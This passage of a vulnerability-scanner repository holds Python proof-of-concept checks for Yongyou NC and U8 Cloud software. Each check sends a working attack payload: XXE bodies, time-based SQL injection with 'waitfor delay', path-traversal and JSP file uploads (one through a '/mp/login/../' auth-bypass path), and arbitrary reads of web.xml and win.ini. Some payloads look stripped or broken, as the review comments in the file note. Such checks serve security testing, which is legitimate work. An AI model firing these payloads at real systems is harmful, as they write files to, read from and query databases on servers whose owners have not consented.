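        'name': '用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = '''__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=]>%26Password;
'''
    vurl = urllib.parse.urljoin(url, "/hrss/dorado/smartweb2.RPC.d?__rpc=true")
    try:
        response = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if response.status_code == 200 and '[fonts]' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result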
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_soapFormat_xxe.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
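def verify(url):
    """XXE check for NC Cloud ``/uapws/soapFormat.ajax``.

    Posts a ``msg`` parameter and looks for ``[fonts]`` (Windows ``win.ini``
    content) in the response.

    NOTE(review): the ``msg`` value as shown here has no DOCTYPE/entity
    declaration - only ``]>soap:Server%26xxe1two%3b`` remains - so the XML
    markup was very likely stripped when this listing was rendered. The
    string is reproduced unchanged; restore it from the upstream source
    before trusting a negative result.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC_Cloud_soapFormat.ajax接口存在XXE',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Connection': 'close',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Upgrade-Insecure-Requests': '1',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = '''msg= ]>soap:Server%26xxe1two%3b%0a'''
    vurl = urllib.parse.urljoin(url, "/uapws/soapFormat.ajax")
    try:
        response = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if response.status_code == 200 and '[fonts]' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result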
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_uploadChunk _fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_number
5 |
6 |
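def verify(url):
    """Check NC-Cloud ``/ncchr/pm/fb/attachment/uploadChunk`` for traversal file write.

    Uploads ``<rand>.txt`` containing a random number with
    ``fileGuid=/../../../nccloud/`` (the traversal lives in the query string,
    which urljoin does not normalise) and fetches ``/nccloud/<rand>.txt``
    looking for the marker. A ``.txt`` is used, so this proves the write
    without dropping executable content.

    NOTE(review): the first line of the multipart body is
    ``--<boundary>--``, the *closing* delimiter form, and line endings are LF.
    Kept as the author had it; confirm against a live target before touching.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (URL of the written file). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-Cloud uploadChunk 任意文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'Content-Type': 'multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9'
    }
    name_token = generate_random_number(6)
    marker = generate_random_number(12)
    data = f'''--024ff46f71634a1c9bf8ec5820c26fa9--
Content-Disposition: form-data; name="file"; filename="{name_token}.txt"

{marker}
--024ff46f71634a1c9bf8ec5820c26fa9--'''
    vurl = urllib.parse.urljoin(url, "/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1")
    check_url = urllib.parse.urljoin(url, f'/nccloud/{name_token}.txt')
    try:
        upload = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if upload.status_code == 200:
            fetched = requests.get(check_url, timeout=timeout)
            if fetched.status_code == 200 and marker in fetched.text:
                result['vulnerable'] = True
                result['verify'] = check_url
        return result
    except requests.RequestException:
        return result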
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_uploadControl_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
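def verify(url):
    """Check Yongyou NC ``uploadControl/uploadFile`` (reached via ``/mp/login/../``) for JSP upload.

    Two defects in the original are fixed here:

    * ``urllib.parse.urljoin`` resolves dot segments, so the request went to
      ``/mp/uploadControl/uploadFile`` and the ``/mp/login/../`` prefix - the
      point of the PoC, presumably an auth-filter bypass on the raw path -
      was never sent. The URL is now built by plain concatenation.
    * The body contains the non-ASCII field value ``上传``. With urllib3 1.x a
      ``str`` body is Latin-1 encoded by ``http.client`` and raises
      ``UnicodeEncodeError``, which the bare ``except`` swallowed, so the check
      silently never ran. The body is now UTF-8 encoded explicitly.

    The uploaded JSP's content is a random marker (instead of the literal
    ``test``) so a generic page containing the word "test" cannot match.

    Side effects: leaves ``/mp/uploadFileDir/<rand>.jsp`` on a vulnerable host.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (URL of the uploaded file). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-uploadControl接口存在文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp',
    }
    name_token = generate_random_str(6)
    marker = generate_random_str(12)
    # NOTE(review): no closing "--boundary--" delimiter and LF line endings,
    # as in the original; confirm against a live target before changing.
    data = f'''------WebKitFormBoundaryoDIsCqVMmF83ptmp
Content-Disposition: form-data; name="file"; filename="{name_token}.jsp"
Content-Type: application/octet-stream

{marker}
------WebKitFormBoundaryoDIsCqVMmF83ptmp
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryoDIsCqVMmF83ptmp'''.encode('utf-8')
    # Deliberately NOT urljoin: it would collapse "/mp/login/../" away.
    vurl = url.rstrip('/') + "/mp/login/../uploadControl/uploadFile"
    check_url = urllib.parse.urljoin(url, f'/mp/uploadFileDir/{name_token}.jsp')
    try:
        upload = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if upload.status_code == 200 and 'true' in upload.text:
            fetched = requests.get(check_url, timeout=timeout)
            if fetched.status_code == 200 and marker in fetched.text:
                result['vulnerable'] = True
                result['verify'] = check_url
        return result
    except requests.RequestException:
        return result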
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_warningDetailInfo_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
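def verify(url):
    """Time-based SQL injection check for Yongyou NC ``/ebvp/infopub/warningDetailInfo``.

    Injects a SQL Server ``waitfor delay '0:0:5'`` into ``pkMessage`` and
    treats an HTTP 500 slower than 5 s as a hit. No baseline request is
    taken, so slow hosts can false-positive.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-warningDetailInfo接口存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    # Longer than the injected 5 s delay.
    timeout = 15
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    vurl = urllib.parse.urljoin(url, "/ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'--")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and response.elapsed.total_seconds() > 5:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result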
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_word.docx_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Probe 用友NC ``word.docx`` for arbitrary file read.

    Issues one GET whose ``disp`` parameter names ``/WEB-INF/web.xml`` and
    treats a 200 whose body mentions ``.jsp`` as positive (presumably because
    a servlet descriptor is expected to reference JSP pages).

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友NC word.docx任意文件读取漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection':'close'
    }
    target = urllib.parse.urljoin(url, "/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml")
    try:
        response = requests.get(target, headers=headers)
        hit = response.status_code == 200 and '.jsp' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_workflowImageServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Time-based SQL injection probe for 用友NC ``workflowImageServlet``.

    One GET carries a six-second ``waitfor delay`` payload in ``proInsPk``;
    the check is positive only when the server answers 500 *and* the round
    trip exceeded five seconds. As with the other timing probes, a slow host
    alone can satisfy the timing half.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友NC-workflowImageServlet接口存在sql注入漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Content-Type':'application/x-www-form-urlencoded'
    }
    target = urllib.parse.urljoin(url, "/portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'--")
    try:
        response = requests.get(target, headers=headers)
        # ``elapsed`` runs until the response headers arrive, which is where a
        # server-side delay becomes visible.
        hit = response.status_code == 500 and response.elapsed.total_seconds() > 5
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_ncsaveDoc.ajax_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 |
6 |
7 | def verify(url):
# Probe for 用友NC ``saveDoc.ajax`` arbitrary file write.
#
# Issues a POST whose ``ws`` parameter carries a traversal path naming a random
# ``.jspx`` file, then GETs that name under ``/uapws/`` and treats a 200 whose
# body contains ``World!`` as positive.
#
# Args:
#     url: Base URL of the target. ``urljoin`` with an absolute path replaces any
#         path already present in ``url``; the second request concatenates onto it.
#
# Returns:
#     ``relsult`` -- dict with ``name``, ``vulnerable`` and ``url``; ``verify``
#     (the fetched-back URL) is added only on a positive result.
8 | relsult = {
9 | 'name': '用友NC-saveDoc.ajax存在任意文件上传漏洞',
10 | 'vulnerable': False,
11 | 'url': url
12 | }
13 | headers = {
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
15 | 'Content-Type': 'application/x-www-form-urlencoded'
16 | }
# NOTE(review): the markup of this literal looks stripped by extraction -- only
# the scriptlet text survives -- so its exact content is not recoverable here.
# The scriptlet as shown prints a greeting and deletes its own file afterwards.
17 | data = '''content=
18 |
19 |
20 | out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete();
21 |
22 | '''
23 | char = generate_random_str(6)
24 | vurl = urllib.parse.urljoin(url, f"/uapws/saveDoc.ajax?ws=/../../{char}.jspx%00")
25 | try:
# The POST below is issued with headers only; ``data`` is not attached to it.
26 | response = requests.post(vurl, headers=headers)
27 | if response.status_code == 200:
28 | vurl = url + f'/uapws/{char}.jspx'
29 | response = requests.get(vurl)
30 | if response.status_code == 200 and 'World!' in response.text:
31 | relsult['vulnerable'] = True
32 | relsult['verify'] = vurl
33 | return relsult
34 |
35 | except:
# Bare except: any failure (including KeyboardInterrupt) yields the default
# "not vulnerable" report.
36 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_FileServlet_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_FileServlet_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordDetailReportQuery_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordDetailReportQuery_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordReportQuery_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_KeyWordReportQuery_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_MeasQueryConditionFrameAction_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_MeasQueryConditionFrameAction_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_RegisterServlet_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_RegisterServlet_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_ServiceDispatcherServlet_deserialization.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_ServiceDispatcherServlet_deserialization.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_base64_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_base64_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_doUpload_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_doUpload_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_linkntb_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_linkntb_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_runScript_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_runScript_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_showRPCLoadingTip_xxe.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_showRPCLoadingTip_xxe.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_upload_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/u8/__pycache__/yongyou_u8_upload_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_FileServlet_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Probe 用友U8-Cloud ``FileServlet`` for arbitrary file read.

    One GET passes a base64-encoded Windows path in ``path``; a 200 whose body
    contains the ``[fonts]`` section header (a win.ini marker) is positive.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友U8-Cloud接口FileServlet存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection':'close'
    }
    target = urllib.parse.urljoin(url, "/service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ==")
    try:
        response = requests.get(target, headers=headers)
        hit = response.status_code == 200 and '[fonts]' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_KeyWordDetailReportQuery_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Time-based SQL injection probe for 用友U8 Cloud ``KeyWordDetailReportQuery``.

    POSTs a JSON document whose ``reportType`` holds a ``WAITFOR DELAY``
    payload. Positive only when the reply is 200, contains ``true`` and took
    more than five seconds; a slow host can satisfy the timing half alone.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection':'close'
    }
    # Sent as a raw string body; no Content-Type is declared for it.
    body = '''{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}'''
    target = urllib.parse.urljoin(url, "/servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery")
    try:
        response = requests.post(target, headers=headers, data=body)
        hit = (
            response.status_code == 200
            and 'true' in response.text
            and response.elapsed.total_seconds() > 5
        )
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_KeyWordReportQuery_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Time-based SQL injection probe for 用友U8 Cloud ``KeyWordReportQuery``.

    POSTs a JSON document (declared as form-urlencoded) whose ``reportType``
    holds a ``waitfor delay`` payload. Positive only when the reply is 200,
    contains ``success`` and took more than five seconds.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    body = '''{"reportType":"1';waitfor delay '0:0:5'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}'''
    target = urllib.parse.urljoin(url, "/service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery")
    try:
        response = requests.post(target, headers=headers, data=body)
        hit = (
            response.status_code == 200
            and 'success' in response.text
            and response.elapsed.total_seconds() > 5
        )
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_MeasQueryConditionFrameAction_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Time-based SQL injection probe for 用友U8-Cloud ``MeasQueryConditionFrameAction``.

    One GET carries a URL-encoded ``WAITFOR DELAY`` payload in
    ``TableSelectedID``. Positive only when the reply is 200, contains the
    ``错误提示`` (error prompt) text and took more than five seconds.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞',
        'vulnerable': False,
        'url': url,
    }
    # Header values reproduced verbatim, including the User-Agent value that
    # has an ``Accept:`` fragment fused onto its end.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
    }
    target = urllib.parse.urljoin(url, "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+")
    try:
        response = requests.get(target, headers=headers)
        hit = (
            response.status_code == 200
            and '错误提示' in response.text
            and response.elapsed.total_seconds() > 5
        )
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_RegisterServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Content-based SQL injection probe for 用友U8-cloud ``RegisterServlet``.

    POSTs a ``usercode`` value that asks the database to hash the string
    ``123456``; the reply is positive when it is 200 and echoes the known MD5
    of that string, which a non-injectable endpoint would not produce.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友U8-cloud RegisterServlet接口存在SQL注入漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36',
        'Connection': 'close',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Forwarded-For': '127.0.0.1',
        'Accept-Encoding': 'gzip'
    }
    body = '''usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--'''
    # MD5("123456") -- the value the injected expression is expected to surface.
    expected_digest = 'e10adc3949ba59abbe56e057f20f883e'
    target = urllib.parse.urljoin(url, "/servlet/RegisterServlet")
    try:
        response = requests.post(target, headers=headers, data=body)
        hit = response.status_code == 200 and expected_digest in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_base64_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Header-based SQL injection probe for 用友U8 Cloud ``/u8cloud/api/file/upload/base64``.

    One GET carries the payload in a custom ``system`` request header; a 200
    whose body contains ``Microsoft`` (a database version banner) is positive.
    The ``name`` field of the report is left empty in this check.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {'name': '', 'vulnerable': False, 'url': url}
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
        "system": "-1' or 1=@@version--+"
    }
    target = urllib.parse.urljoin(url, "/u8cloud/api/file/upload/base64")
    try:
        response = requests.get(target, headers=headers)
        hit = response.status_code == 200 and 'Microsoft' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_doUpload_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Probe 用友U8-OA ``doUpload.jsp`` for unrestricted file upload.

    POSTs a hand-built multipart body naming ``info.jsp`` and treats a 200
    reply whose body mentions ``.jsp`` as positive. Unlike the other upload
    probes, no second request fetches the file back.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        upload URL on a positive result.
    """
    report = {
        'name': '用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞',
        'vulnerable': False,
        'url': url,
    }
    # Headers reproduced verbatim: the ``Connection`` value has the
    # ``Content-Type: multipart/...`` declaration fused onto it, so no
    # separate Content-Type header is sent for the multipart body.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept': 'image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8',
        'Connection': 'closeContent-Type: multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75',
        'Upgrade-Insecure-Requests': '1'
    }
    boundary = '7b1db34fff56ef636e9a5cebcd6c9a75'
    # Newline-separated exactly as the original triple-quoted literal.
    body = '\n'.join([
        f'--{boundary}',
        'Content-Disposition: form-data; name="iconFile"; filename="info.jsp"',
        'Content-Type: application/octet-stream',
        '',
        '<% out.println("tteesstt1"); %>',
        f'--{boundary}--',
    ])
    target = urllib.parse.urljoin(url, "/yyoa/portal/tools/doUpload.jsp")
    try:
        response = requests.post(target, headers=headers, data=body)
        hit = response.status_code == 200 and '.jsp' in response.text
    except BaseException:
        # Mirrors the original bare except: any failure -> default report.
        return report
    if hit:
        report['vulnerable'] = True
        report['verify'] = target
    return report
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/u8/yongyou_u8_linkntb_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Content-based SQL injection probe for 用友U8-Cloud ``linkntb.jsp`` (CNVD-C-2023-708748).

    One GET carries a URL-encoded payload in ``billId`` that, if evaluated by
    the database, causes the fixed marker ``qkqxq`` to appear in the reply.
    Positive only when the reply is 200 and contains that marker.

    Args:
        url: Base URL of the target; the absolute endpoint path replaces any
            path already present in ``url``.

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` holds the
        probed URL on a positive result.
    """
    report = {
        'name': '用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748)',
        'vulnerable': False,
